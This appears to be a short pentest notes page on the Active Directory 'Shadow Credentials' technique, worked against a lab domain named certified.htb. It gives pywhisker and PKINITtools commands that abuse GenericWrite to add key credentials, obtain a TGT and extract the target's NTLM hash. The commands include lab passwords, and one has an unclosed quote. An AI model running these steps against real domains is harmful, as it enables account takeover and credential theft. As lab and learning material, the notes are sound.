Pentest - Active Directory - Shadow Credentials

Shadow Credentials

Abuse the GenericWrite ACL to get control of an account by adding shadow credentials:

1

python3 /opt/pywhisker/pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add

The output is a PFX cert that can be used to authenticate as the user. Get a TGT for the user with PKINITtools:

1

python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx vGRMeeb9.pfx certified.htb/management_svc -pfx-pass '25nQ6mg4JUTeQEjjNRE2' management_svc.ccache

This will create a Kerberos ticket called management_svc.ccache file, which we can export and use the key this output provides in conjunction with getnthash.py from the same toolkit to get the NTLM hash of the management_svc user.

dsinternals Detecting shadow credentials hacker recipes hackingarticles medium